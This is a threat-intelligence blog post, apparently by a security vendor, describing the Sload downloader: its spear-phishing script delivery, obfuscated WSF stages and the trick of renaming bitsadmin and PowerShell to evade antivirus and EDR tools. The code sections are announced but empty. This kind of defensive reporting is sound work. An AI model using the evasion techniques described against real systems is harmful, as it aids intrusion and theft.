Sload (also known as Starslord loader) is one of the most dangerous malware strain in recent years. It usually functions as a downloader, which is a computer virus that collects and exfiltrates information from the infected device, with the purpose of assessing the target and dropping a more significant payload if the target seems profitable. Mainly targeting Europe, Sload has been in active use since at least 2018, where multiple vendors have reported attacks on targets in the UK and Italy. The malware’s developer/s have taken a unique approach; instead of using an executable or a malicious document to infiltrate machines, they use scripts that are native to Windows operating systems, such as VBS and PowerShell as an initial foothold, tricking users into executing them using spear phishing.
The downloader is actively developed and has been through several iterations; its creator is constantly changing the first stage script, while the main module remains more or less consistent. First reports of this malware indicate that it uses a rogue LNK file (Windows shortcut) to download a PowerShell script, which will eventually download and execute Sload. Later editions begin with obfuscated WSF/VBS scripts, which are frequently mutated to bypass AV detection. The initial script employed in attacks repeatedly scores low on VirusTotal and is designed to bypass advanced security tools such as EDRs.
Minerva Labs have seen Sload infections coming from Italian endpoints this year, aligning with the information provided in this tweet. The script we encountered is an obfuscated WSF script that decodes a set of malicious commands, and once executed, will stealthily download and run a remote payload in memory. This is achieved using a simple evasion technique, the script renames legitimate Windows binaries. Both “bitsadmin.exe” and “Powershell.exe” are copied and renamed, the former is used to download a malicious PowerShell script and the latter loads it to memory and begins its execution.
The decoded commands (commented by us):
The obfuscated WSF Script:
The final payload of this downloader varies, but it was reported to drop Ramnit and Trickbot banking trojans, both of which are highly hazardous malware that may even lead to ransomware. Minerva prevents Sload and its subsequent payloads: